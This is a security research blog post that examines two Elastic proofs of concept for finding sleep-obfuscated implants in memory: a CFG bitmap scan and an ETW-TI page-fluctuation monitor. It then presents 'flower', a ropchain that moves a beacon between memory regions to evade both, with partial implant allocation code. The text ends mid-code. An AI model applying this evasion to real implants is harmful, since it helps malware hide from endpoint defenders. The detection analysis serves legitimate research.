prelude
This blogpost adds more insight to the talk I gave at university. I went down several rabbit holes when it comes to in-memory evasion, both from an offensive and a defensive perspective. I hope it will give others more ideas, as there are many more things to uncover about this subject. More on this subject soon TM.
The technique presented here is rather primitive and, if anything, very silly; it does prove one thing though: even the more cutting-edge and scalable detections can be juked very easily.
Only by defenders and attackers working together will this field keep moving forward.
intro
Sleep obfuscation has now become a core component of modern implants, allowing an implant to conceal itself at rest and thus hide some, if not most, in-memory IOCs which can be hunted for with modern memory scanners (cf. Moneta and PE-Sieve).
However, in recent months, new ways to find those concealed implants were discussed at BLACKHAT ASIA 2023 by John Uhlmann (aka jdu2600), a security engineer specializing in scalable Windows in-memory malware detection @ ELASTIC. It is worth noting that some of the research was uncovered by Gabriel Landau, a “WinDbg’er” @ ELASTIC.
These new ways tackle the in-memory threat detection problem by leveraging two already existing components in the Windows operating system. They also fortunately address every public sleep obfuscation implementation, rendering them insufficient by themselves.
you can run but you can’t hide
3 POCs were published following the talk, but only two of them are really relevant for us. I mean no offense to the one-of-a-kind work of Mr Uhlmann, Mr Landau and ELASTIC as a whole when saying this, and I kindly invite you to first go watch the talk on youtube.com and give the POCs a quick read on GitHub.
The two POCs are:
- CFG-FindHiddenShellcode which uses the CFG bitmap
- EtwTi-FluctuationMonitor which leverages the immutable page principle
What’s so special about them ? Coupled together they can detect beloved and commonly used implementations of Ekko/Zilean, FOLIAGE, Gargoyle, … pretty accurately and with minimal overhead (no “who up callin RtlCreateTimer/NtQueueApcThread ?”).
The scope of this blogpost is to prove that it is in fact possible to address those two rather new detections in a rather silly way (I will talk about a sane way but it’s not as silly >:[ ). I won’t spend too much time talking about how current sleep obfuscation techniques work in depth or why they are important (since it’s not exactly new and I am trying to keep the blogpost concise). I will instead recommend you watch Kyle Avery’s excellent talk on the matter if you are not up to speed already.
Unbeknownst to ELASTIC and Mr Uhlmann, I can run AND hide.
CFG-FindHiddenShellcode
So the first POC that caught my attention was CFG-FindHiddenShellcode. It leverages the CFG bitmap to find previously executable regions, which comes in handy when you want to find concealed implants which, at rest, will appear as ~X.
But how ? why ? and what is even the CFG ?
wat da hell is CFG
Control Flow Guard is an exploit mitigation introduced in KB3000850 (November of 2014). It prevents the redirection of control flow to unexpected locations. This is achieved by the compiler inserting CFG instrumentation into the code, tightly restricting where indirect calls can land.
At runtime, the inserted check (__guard_check_icall_fptr) will call ntdll!LdrpValidateUserCallTarget.
CFG is known to be a pain in the case of sleep obfuscation due to most techniques (EKKO/ZILEAN/FOLIAGE/…) doing indirect calls through NtContinue, and can be a pain in general, even in legit (but usually old or lazy) software. It is therefore possible to add exceptions/valid targets so your process doesn’t blow up, as shown here:
// credits @C5pider (havoc)
/*!
 * @brief
 *  add module + function to CFG exception list.
 *
 * @param ImageBase
 * @param Function
 */
VOID CfgAddressAdd(
    IN PVOID ImageBase,
    IN PVOID Function
) {
    CFG_CALL_TARGET_INFO Cfg      = { 0 };
    MEMORY_RANGE_ENTRY   MemRange = { 0 };
    VM_INFORMATION       VmInfo   = { 0 };
    PIMAGE_NT_HEADERS    NtHeader = { 0 };
    ULONG                Output   = 0;
    NTSTATUS             NtStatus = STATUS_SUCCESS;

    NtHeader                = C_PTR( ImageBase + ( ( PIMAGE_DOS_HEADER ) ImageBase )->e_lfanew );
    /* SizeOfImage rounded up to the next page boundary */
    MemRange.NumberOfBytes  = U_PTR( NtHeader->OptionalHeader.SizeOfImage + 0x1000 - 1 ) &~( 0x1000 - 1 );
    MemRange.VirtualAddress = ImageBase;

    /* set cfg target call info */
    Cfg.Flags  = CFG_CALL_TARGET_VALID;
    Cfg.Offset = Function - ImageBase;

    VmInfo.dwNumberOfOffsets = 1;
    VmInfo.plOutput          = &Output;
    VmInfo.ptOffsets         = &Cfg;
    VmInfo.pMustBeZero       = FALSE;
    VmInfo.pMoarZero         = FALSE;

    if ( ! NT_SUCCESS( NtStatus = SysNtSetInformationVirtualMemory( NtCurrentProcess(), VmCfgCallTargetInformation, 1, &MemRange, &VmInfo, sizeof( VmInfo ) ) ) ) {
        PRINTF( "NtSetInformationVirtualMemory Failed => 0x%lx", NtStatus );
    }
}
You would normally use the “SetProcessValidCallTargets” API, however I wanted to show this snippet for a more detailed explanation of how this is achieved. It might also sound counterintuitive that you can just add a valid indirect call target at will. However, for shellcode to add itself as a valid indirect call target, it would need to somehow already be a valid target, considering you would need code execution. In layman’s terms, this is a typical chicken and egg problem.
This way, additional memory ranges can be marked as valid in the eyes of CFG. But how does it keep track of those ?
bits and maps
CFG uses a bitmap to keep track of valid targets, where a set bit indicates that the address is a valid indirect call target. This bitmap is mapped in CFG-enabled processes when they are created; once mapped, the OS stores the address of said bitmap at ntdll!LdrSystemDllInitBlock + 0x60 and its size at ntdll!LdrSystemDllInitBlock + 0x68 (keep in mind these offsets have changed between Windows versions). Before an indirect call, ntdll!LdrpValidateUserCallTarget is called to verify the target address at runtime.
It would be good to note that the CFG bitmap is PAGE_READONLY and that trying to tamper with it upfront would be a very poor way to go about things.
ntdll!LdrpValidateUserCallTarget (called by __guard_check_icall_fptr in our CFG instrumented binary) tests a bit of the CFG bitmap that corresponds to the target address.
As explained by Zhang Yunhai, the following is how the bitmap is tested:
- Extract the highest 24 bits of the target address to form an index
- Fetch a 32-bit DWORD from the CFG Bitmap using the index
- Extract the 4th to 8th bits of the target address to form an offset n
- Set the lowest bit of offset n if the target address is not 0x10 aligned
- Test the nth bit of the 32-bit DWORD
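The steps above can be sketched in a few lines of portable C. This is only a toy model, assuming the 32-bit layout those steps describe; the names cfg_dword_index, cfg_bit_offset and cfg_is_valid_target are made up for illustration and are not ntdll symbols, and the bitmap here is a plain array rather than the real mapped one.

```c
#include <stdbool.h>
#include <stdint.h>

/* Highest 24 bits of the target address select the DWORD. */
uint32_t cfg_dword_index(uint32_t target) {
    return target >> 8;
}

/* Bits 3..7 of the address (the "4th to 8th bits") select the bit,
   and the lowest bit of that offset is forced to 1 when the target
   is not 0x10 aligned. */
uint32_t cfg_bit_offset(uint32_t target) {
    uint32_t n = (target >> 3) & 0x1Fu;
    if (target & 0xFu)
        n |= 1u;
    return n;
}

/* Test the nth bit of the selected DWORD (toy bitmap, not the real one). */
bool cfg_is_valid_target(const uint32_t *bitmap, uint32_t target) {
    return ((bitmap[cfg_dword_index(target)] >> cfg_bit_offset(target)) & 1u) != 0;
}
```

With this model, marking 0x120 as valid sets bit 4 of DWORD 1, while the unaligned 0x124 maps to bit 5 of the same DWORD and therefore stays invalid.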
If the bit isn’t set, then the target address is invalid. In this case, ntdll!RtlpHandleInvalidUserCallTarget is called, which raises interrupt 0x29 (__fastfail) unless specific conditions are met, including:
where ?
This bitmap is stored in PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap; however, the way it’s fetched in the POC works around the fact that the structure itself is not documented and that its offset has changed previously:
PVOID GetCfgBitmapPointer()
{
    PVOID pCfgBitmap = NULL;

    // PS_SYSTEM_DLL_INIT_BLOCK is exported from ntdll as LdrSystemDllInitBlock, but the structure itself is not documented
    // and the offset has changed previously.
    // We could hardcode offsets, or bruteforce this block looking for a pointer that matches the expected 2TB MEM_MAPPED
    // region characteristics.

    // However, the first instruction of LdrControlFlowGuardEnforced is usually -
    // 48 83 3D xx xx xx xx 00    cmp PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap, 0
    // So we can calculate the absolute address from the rel32 offset in this instruction.
    // (rel32 starts at byte 3, and the instruction is 8 bytes long, hence the +3 and +8 below)
    PVOID pLdrControlFlowGuardEnforced = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrControlFlowGuardEnforced");
    if (!pLdrControlFlowGuardEnforced)
        return NULL;

    PUCHAR Rip = (PUCHAR)pLdrControlFlowGuardEnforced + 8;
    PDWORD pRipRelativeOffset = (PDWORD)((PUCHAR)pLdrControlFlowGuardEnforced + 3);
    DWORD RipRelativeOffset = 0;
    SIZE_T szBytesRead = 0;
    if (!ReadProcessMemory(GetCurrentProcess(), pRipRelativeOffset, &RipRelativeOffset, sizeof(RipRelativeOffset), &szBytesRead))
        return NULL;

    return Rip + RipRelativeOffset;
}
The reason why the author can read the memory of our own process is due to how ASLR and known DLLs (which use COW) behave. PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap lives in ntdll.dll, which is a known DLL, thus this pointer to the CFG bitmap lives at the same address in every usermode process. So computing the pointer’s address in our process or a remote one doesn’t really matter; what matters is which address space we read it from.
bitmap behavior
By default, *Protect and *Alloc functions treat a specified region of PAGE_EXECUTE + MEM_COMMIT pages as valid indirect call targets and update the bitmap accordingly. It is possible to override this behavior by specifying PAGE_TARGETS_INVALID when calling *Alloc functions or PAGE_TARGETS_NO_UPDATE when calling *Protect functions (when changing the protection to *X).
/*
EXTRACT OF [https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants]
Constants > PAGE_TARGETS_NO_UPDATE
[...] The default behavior for VirtualProtect protection change to executable is to mark all locations as valid call targets for CFG.
Constants > PAGE_TARGETS_INVALID
Sets all locations in the pages as invalid targets for CFG. Used along with any execute page protection like PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY.
Any indirect call to locations in those pages will fail CFG checks and the process will be terminated.
The default behavior for executable pages allocated is to be marked valid call targets for CFG.
*/
The reason for this default behavior, and why private executable memory in general is a thing, is JIT, which we will talk about later on.
This means that when a committed memory region has its protection changed to X, the CFG bitmap will by default record the region as a valid indirect call target (unless specified otherwise, as explained previously). However, the bitmap WILL NOT be updated when the protection is toggled to ~X: once the region has been marked as a valid indirect call target, the mark remains no matter its later protections; see where we’re going ??
the blessed side-effect
Now that we know how the bitmap acts, the following can be established:
“The CFG bitmap, as an unintended side-effect, will record the location of every private memory region that are or were previously executable during the lifetime of the process”
This is actually a very powerful side-effect: considering a beacon at rest will appear as ~X when performing sleep obfuscation, it is possible, through the bitmap, to know if it was previously executable, effectively making concealed beacons stand out in most host processes.
This “side-effect” is what CFG-FindHiddenShellcode harnesses to uncover “hidden” pages (pages that were previously executable but now aren’t). If it were chained in a detection pipeline, it would certainly help when it comes to triaging processes worth scanning. It is also cheap enough performance wise.
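To make the side-effect tangible, here is a deliberately tiny model of a single private page. It is a sketch, not how Windows stores anything: toy_page, toy_protect and toy_is_hidden are hypothetical names, and the only behavior modeled is the one described above (the mark is set when the page becomes executable with default flags and is never cleared afterwards).

```c
#include <stdbool.h>

/* Toy model of one private page: its current protection plus the
   sticky "was a valid call target" mark kept by the CFG bitmap. */
typedef struct {
    bool executable_now;
    bool cfg_marked;
} toy_page;

/* Models a *Protect call with default flags: going executable sets
   the mark, dropping execute leaves the mark untouched. */
void toy_protect(toy_page *page, bool make_executable) {
    page->executable_now = make_executable;
    if (make_executable)
        page->cfg_marked = true;
}

/* "Hidden" in the POC's sense: marked in the bitmap, yet not
   executable right now. */
bool toy_is_hidden(const toy_page *page) {
    return page->cfg_marked && !page->executable_now;
}
```

A beacon that goes RX and then back to ~X for its sleep ends up hidden in this model, while a region that was never executable does not.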
We can see the CFG bitmap being used in action to find hidden pages in the main source file. As said previously, the pointer lives at the same location in every process however we only care about reading what it points to in the relevant processes.
PULONG_PTR GetCfgBitmap(HANDLE hProcess)
{
    static PVOID ppCfgBitmap = GetCfgBitmapPointer();
    PULONG_PTR pCfgBitmap = NULL;
    MEMORY_BASIC_INFORMATION mbi{};
    SIZE_T szBytesRead = 0;

    if (!ppCfgBitmap ||
        !ReadProcessMemory(hProcess, ppCfgBitmap, &pCfgBitmap, sizeof(pCfgBitmap), &szBytesRead) ||
        (0 == pCfgBitmap) ||
        !VirtualQueryEx(hProcess, pCfgBitmap, &mbi, sizeof(mbi)))
    {
        return NULL;
    }

    // Quick sanity check that our CFG bitmap pointer is the base of a MEM_MAPPED allocation.
    // We could also validate that it is 2TB in size.
    if ((mbi.AllocationBase != pCfgBitmap) || (MEM_MAPPED != mbi.Type))
    {
        printf("%p PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap = %p is invalid\n", ppCfgBitmap, pCfgBitmap);
        pCfgBitmap = NULL;
    }

    return pCfgBitmap;
}
Once the CFG bitmap of a process of interest is retrieved, the author queries its address space in search of MEM_COMMIT pages, and when such pages are found, queries the bitmap with an index shift of 9:
ULONG_PTR vaRegionEnd = va + mbiCfg.RegionSize * 64;
while (va < vaRegionEnd)
{
    pCfgEntry = pCfgBitMap + ((ULONG_PTR)va >> CFG_INDEX_SHIFT);
    SIZE_T stBytesRead = 0;
    ULONG_PTR ulEntry = 0;
    // TODO(jdu) This per-entry read is inefficient - just read the whole region upfront instead.
    if (!ReadProcessMemory(hProcess, pCfgEntry, &ulEntry, sizeof(ulEntry), &stBytesRead))
        break;
Each CFG bitmap page corresponds to 64 VA pages.
The main detection mechanism is a bit later in the code:
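Where does the 64 come from? A quick worked calculation, assuming 4 KiB pages and 8-byte bitmap entries (ULONG_PTR on x64); the shift of 9 is the one used by the POC, the function names are mine.

```c
#include <stdint.h>

#define CFG_INDEX_SHIFT 9u      /* index shift used by the POC */
#define PAGE_SIZE_BYTES 4096u   /* assumption: 4 KiB pages */

/* VA bytes described by one 8-byte bitmap entry: 1 << 9 = 512. */
uint64_t va_bytes_per_entry(void) {
    return UINT64_C(1) << CFG_INDEX_SHIFT;
}

/* 8-byte entries that fit in one bitmap page: 4096 / 8 = 512. */
uint64_t entries_per_bitmap_page(void) {
    return PAGE_SIZE_BYTES / sizeof(uint64_t);
}

/* VA pages described by one bitmap page: 512 * 512 / 4096 = 64. */
uint64_t va_pages_per_bitmap_page(void) {
    return va_bytes_per_entry() * entries_per_bitmap_page() / PAGE_SIZE_BYTES;
}

/* Index of the bitmap entry that describes a given VA. */
uint64_t cfg_entry_index(uint64_t va) {
    return va >> CFG_INDEX_SHIFT;
}
```

This is also why the POC multiplies mbiCfg.RegionSize by 64 to turn a size in the bitmap into a size in the address space it describes.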
if ((hiddenRegionSize > 0) && ((MAXULONG_PTR != ulEntry) || (va == vaRegionEnd)))
{
    // The CFG bitmap indicates that this region has been executable during the lifetime
    // of the process. Now check the VAD tree.
    MEMORY_BASIC_INFORMATION mbiStart{};
    MEMORY_BASIC_INFORMATION mbiEnd{};
    if (VirtualQueryEx(hProcess, (PVOID)hiddenRegionStart, &mbiStart, sizeof(mbi)) &&
        (MEM_COMMIT == mbiStart.State) &&
        VirtualQueryEx(hProcess, (PVOID)(hiddenRegionStart + hiddenRegionSize - 1), &mbiEnd, sizeof(mbi)))
    {
        // Is this region non-executable in the VAD tree?
        bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
                             !(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);

        // Handle a few common (likely) false positives.
        bool bLikelyFalsePositive =
            (mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
            (hiddenRegionSize == 0x3000);                         // 12K region

        if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
        {
            result.push_back((PVOID)(hiddenRegionStart));
        }
    }
    hiddenRegionStart = 0;
    hiddenRegionSize = 0;
}
Since the CFG bitmap indicates that the region has been executable at some point, the author queries the region of interest. If, according to the VAD (Virtual Address Descriptor), the region isn’t executable, as seen in the bHiddenRegion bool:
constexpr auto PAGE_EXECUTE_FLAGS = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY;
[...]
// Is this region non-executable in the VAD tree?
bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
                     !(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);
Then the region is considered as “hidden” because although the CFG bitmap clearly states that said region was previously executable, it now isn’t. Thus the hidden region is saved to our results vector.
if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
{
    result.push_back((PVOID)(hiddenRegionStart));
}
It’s worth noting that jdu2600 still makes sure to account for false positives:
// Handle a few common (likely) false positives.
bool bLikelyFalsePositive =
    (mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
    (hiddenRegionSize == 0x3000);                         // 12K region
This logic is repeated for every VA in the process (whilst still making sure we don’t go over vaRegionEnd):
va += mbiCfg.RegionSize * 64; // Each CFG BitMap page corresponds to 64 VA pages
This is an efficient, low-overhead, scalable and pretty sneaky detection.
EtwTi-FluctuationMonitor
This is the second POC that caught my attention and it’s, in my silly opinion, the nastiest of the two because it goes to show how OP ETW-TI is as a technology for defenders.
I should mention you could remove the talking stick privilege from ETW-TI in Windows 10 and some versions of Windows 11 (see etw-bye.cpp).
the immutable page principle
This section will be extremely short because it’s something that just makes sense if you think about it.
As said by jdu2600:
It is security best practice that once a page is marked executable it should be immutable
That is the memory protection progression for code pages should only be RW to RX
TL;DR: non-executable memory made executable shouldn’t evolve beyond that point, apart from being freed; the same applies to writable memory made non-writable.
what about JIT
Private memory being made executable and then executed is not a direct sign of something suspicious going on, as that’s how JIT behaves. However, JIT (just-in-time) compilers, just like AOT (ahead-of-time) compilers, only compile once.
It’s important to note that some JIT engines reuse allocations (I think .NET reuses them ?) and there is also legitimate API hooking to account for (for instance, Discord will inject a hook to record your screen when you’re streaming).
As explained in the POC itself, fluctuation is still wildly different from JIT/AOT:
// The set of all of the code pages in a process that have transitions from writable to non-writable,
// or from executable to non-executable. In both cases, these code pages should never be modified again.
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...
ETW who ?
ETW-TI is a kernel-mode technology allowing the generation of events upon security-critical operations, including but not limited to executable memory creation and memory protection changes.
This event feed, produced by EtwTi* functions embedded in the relevant kernel functions, can only be consumed by security products, which need to run protected (PROTECTED_ANTIMALWARE_LIGHT) and are thus required to be signed as such by Microsoft.
A list of all the event keywords (at least on my system) can be found below:
# logman query providers Microsoft-Windows-Threat-Intelligence
Provider GUID
-------------------------------------------------------------------------------
Microsoft-Windows-Threat-Intelligence {F4E1897C-BB5D-5668-F1D8-040F4D8DD344}
Value Keyword Description
-------------------------------------------------------------------------------
0x0000000000000001 KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL
0x0000000000000002 KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER
0x0000000000000004 KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE
0x0000000000000008 KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE_KERNEL_CALLER
0x0000000000000010 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
0x0000000000000020 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER
0x0000000000000040 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE
0x0000000000000080 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER
0x0000000000000100 KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL
0x0000000000000200 KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL_KERNEL_CALLER
0x0000000000000400 KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE
0x0000000000000800 KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE_KERNEL_CALLER
0x0000000000001000 KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE
0x0000000000002000 KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE_KERNEL_CALLER
0x0000000000004000 KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE
0x0000000000008000 KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER
0x0000000000010000 KERNEL_THREATINT_KEYWORD_READVM_LOCAL
0x0000000000020000 KERNEL_THREATINT_KEYWORD_READVM_REMOTE
0x0000000000040000 KERNEL_THREATINT_KEYWORD_WRITEVM_LOCAL
0x0000000000080000 KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE
0x0000000000100000 KERNEL_THREATINT_KEYWORD_SUSPEND_THREAD
0x0000000000200000 KERNEL_THREATINT_KEYWORD_RESUME_THREAD
0x0000000000400000 KERNEL_THREATINT_KEYWORD_SUSPEND_PROCESS
0x0000000000800000 KERNEL_THREATINT_KEYWORD_RESUME_PROCESS
0x0000000001000000 KERNEL_THREATINT_KEYWORD_FREEZE_PROCESS
0x0000000002000000 KERNEL_THREATINT_KEYWORD_THAW_PROCESS
0x0000000004000000 KERNEL_THREATINT_KEYWORD_CONTEXT_PARSE
0x0000000008000000 KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_VAD_PROBE
0x0000000010000000 KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_MMF_NAME_PROBE
0x0000000020000000 KERNEL_THREATINT_KEYWORD_READWRITEVM_NO_SIGNATURE_RESTRICTION
0x0000000040000000 KERNEL_THREATINT_KEYWORD_DRIVER_EVENTS
0x0000000080000000 KERNEL_THREATINT_KEYWORD_DEVICE_EVENTS
0x0000000100000000 KERNEL_THREATINT_KEYWORD_READVM_REMOTE_FILL_VAD
0x0000000200000000 KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE_FILL_VAD
0x0000000400000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_FILL_VAD
0x0000000800000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER_FILL_VAD
0x0000001000000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_FILL_VAD
0x0000002000000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER_FILL_VAD
0x8000000000000000 Microsoft-Windows-Threat-Intelligence/Analytic
Value Level Description
-------------------------------------------------------------------------------
0x04 win:Informational Information
PID Image
-------------------------------------------------------------------------------
0x00000000
In the case of EtwTi-FluctuationMonitor, the keyword being leveraged is KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL, as seen in the first lines of the POC:
int wmain(int, wchar_t**) {
    printf("[*] Enabling Microsoft-Windows-Threat-Intelligence (KEYWORD_PROTECTVM_LOCAL)\n");
    krabs::provider<> ti_provider(L"Microsoft-Windows-Threat-Intelligence");
    ti_provider.any(0x10); // KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
    krabs::event_filter protectvm_filter(krabs::predicates::id_is(7));
This event occurs when a *Protect function is called; some information is emitted with it, such as:
- PID
- Base address
- Protection mask
- Last protection mask
The information of the event is then parsed:
auto protectvm_cb = [](const EVENT_RECORD& record, const krabs::trace_context& trace_context) {
    krabs::schema schema(record, trace_context.schema_locator);
    krabs::parser parser(schema);
    auto ProcessID = parser.parse<DWORD>(L"CallingProcessId");
    auto BaseAddress = parser.parse<PVOID>(L"BaseAddress");
    auto ProtectionMask = parser.parse<DWORD>(L"ProtectionMask");
    auto LastProtectionMask = parser.parse<DWORD>(L"LastProtectionMask");
Then, using ProtectionMask and LastProtectionMask, we can see the implementation of the immutable page principle in action:
if ((!IsExecutable(LastProtectionMask) && IsExecutable(ProtectionMask)) ||
    (IsWritable(LastProtectionMask) && !IsWritable(ProtectionMask)))
Once a writable page is made non-writable or a non-executable page is made executable, said page is recorded as now being immutable.
g_ImmutableCodePages[ProcessID].insert(BaseAddress);
However, if the page was already immutable, then an alert is raised:
auto immutable_iter = g_ImmutableCodePages.find(ProcessID);
if (immutable_iter != g_ImmutableCodePages.cend() &&
    immutable_iter->second.find(BaseAddress) != immutable_iter->second.cend())
{
    // An immutable code page has been potentially modified.
    CONSOLE_SCREEN_BUFFER_INFO console_info{};
    static auto hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
    GetConsoleScreenBufferInfo(hStdOutput, &console_info);
    SetConsoleTextAttribute(hStdOutput, RED);
    printf("[!] %S %p is fluctuating\n", ProcessName(ProcessID).c_str(), BaseAddress);
    SetConsoleTextAttribute(hStdOutput, console_info.wAttributes);
}
Since it’s a POC it just gives a nice, although a bit scary, warning, but this could be used to alert on or even triage processes worth further analysis.
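Put together, the whole detection boils down to a small state machine. The sketch below models it in portable C so it can be played with outside of Windows. Treat it as an approximation: the fixed-size array stands in for the POC's per-process sets, the "check first, then record" ordering is my assumption, and tracker, on_protect_event and friends are hypothetical names. The PAGE_* values are the usual winnt.h ones.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Windows memory protection constants (values from winnt.h). */
#define PAGE_READWRITE         0x04u
#define PAGE_WRITECOPY         0x08u
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#define PAGE_EXECUTE_WRITECOPY 0x80u

#define MAX_TRACKED 64 /* toy capacity, the POC uses growable sets */

typedef struct { uint32_t pid; uintptr_t base; } tracked_page;
typedef struct { tracked_page pages[MAX_TRACKED]; size_t count; } tracker;

bool is_executable(uint32_t prot) {
    return (prot & (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                    PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

bool is_writable(uint32_t prot) {
    return (prot & (PAGE_READWRITE | PAGE_WRITECOPY |
                    PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

bool is_tracked(const tracker *t, uint32_t pid, uintptr_t base) {
    for (size_t i = 0; i < t->count; i++)
        if (t->pages[i].pid == pid && t->pages[i].base == base)
            return true;
    return false;
}

/* Feed one PROTECTVM_LOCAL-style event into the model.
   Returns true when the page was already recorded as immutable,
   i.e. when the POC would print "is fluctuating". */
bool on_protect_event(tracker *t, uint32_t pid, uintptr_t base,
                      uint32_t new_prot, uint32_t last_prot) {
    bool fluctuating = is_tracked(t, pid, base);
    bool now_immutable =
        (!is_executable(last_prot) && is_executable(new_prot)) ||
        (is_writable(last_prot) && !is_writable(new_prot));

    if (now_immutable && !fluctuating && t->count < MAX_TRACKED) {
        t->pages[t->count].pid = pid;
        t->pages[t->count].base = base;
        t->count++;
    }
    return fluctuating;
}
```

In this model a single RW->RX transition on a page is recorded quietly, and any later protection change on that same base address is flagged, whereas an RW->RX transition on a base address never seen before is not.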
the silly overlap
There is (understandably) some overlap between those two POCs: to dodge both, we need to avoid fluctuating and thus break the chain between each RW->RX toggle. Ironically, EtwTi-FluctuationMonitor had the answer for us all this time.
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...
We just need to behave like “proper” JIT (I am following their definitions) and we’ll be fine. Optionally and as always we could just stay in a .NET RWX JIT region and chill there, simple and works, on top of being less suspicious than “mockingjay” by a mile; but eh that’s a bit boring isn’t it ?
the silly solution
The solution presented here is stupid but works; does that mean the detections are stupid ? ~~Yes~~ No, but it goes to show how attackers can masquerade as legit behavior, even if in a stupid way, to slip through detections.
the modified ropchain
By making our beacon move itself in memory we can simulate JIT behavior and slip through an honest gap in those detections.
I say JIT, though I am aware it’s a dollar store version of it; I am only calling it this because it’s the very behavior that the aforementioned POCs have to account for to not have too many FPs.
The following allows this:
- Allocate a new region as RW
- Ropchain:
  - Wait for start
  - Move ourselves to new region
  - [optionally zero the old copy]
  - Free the old region
  - stack masking/encryption/…
  - Sleep
  - Undo stack masking/encryption/…
  - Protect new region as RX
  - the end
I codename this ropchain logic flower.
This slips through CFG-FindHiddenShellcode, as the “new region” was never executable before and thus does not count as a hidden page, and through EtwTi-FluctuationMonitor, since it looks like we are doing “proper” JIT ( RW->memcpy->RX->FREE ).
allocation from the dollar store
To flow through memory, we try to allocate a new region at a given offset from ourselves in memory. It’s worth noting you could totally omit this and just allocate a new region and ball. We do this simply to avoid going in a region where we were previously, not that I think it would matter.
TL;DR: cuz i can and i will
FUNC PVOID FwpMemPrepare(
    _In_ PFLOWER_CTX Ctx,
    _In_ ULONG       Size
) {
    PVOID Memory = { 0 };
    ULONG Offset = FW_BASE_OFS;
    ULONG Prot   = PAGE_READWRITE;

    //
    // try allocating a new region till we are successful
    // if an allocation fails, increment the base offset from
    // the shellcode base by ShiftOfs
    //
    PRINTF( "[FLOWER] [*] Trying to allocate NxtBuf @ %p\n", C_PTR( U_PTR( SHC_START() ) + Offset ) );
    while ( TRUE ) {
        if ( ! ( Memory = Ctx->Win32.VirtualAlloc(
            C_PTR( U_PTR( SHC_START() ) + Offset ),
            Size,
            ( MEM_COMMIT | MEM_RESERVE ),
            Prot
        ) ) ) {
            Offset += FW_SHIFT_OFS;
            continue;
        }

        PRINTF( "[FLOWER] [*] NxtBuf allocated @ %p\n", Memory );
        break;
    }

    return Memory;
}
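Two details are worth keeping in mind with this loop: VirtualAlloc rounds a requested reservation address down to the allocation granularity, and the loop as written never gives up. The sketch below models both points in portable C. It is not the project's code: the 64 KiB granularity is an assumption (it is the usual value on Windows), fw_candidate and fw_try_allocate are hypothetical names, and fake_alloc is only a stand-in for VirtualAlloc so the example can run anywhere.

```c
#include <stddef.h>
#include <stdint.h>

#define ALLOC_GRANULARITY 0x10000u /* assumption: 64 KiB */

/* Allocator callback shape used by this sketch (stand-in for VirtualAlloc). */
typedef void *(*fw_alloc_fn)(uintptr_t address, size_t size);

/* Address the n-th attempt effectively targets:
   start + base_ofs + n * shift_ofs, rounded down to the granularity. */
uintptr_t fw_candidate(uintptr_t shc_start, uintptr_t base_ofs,
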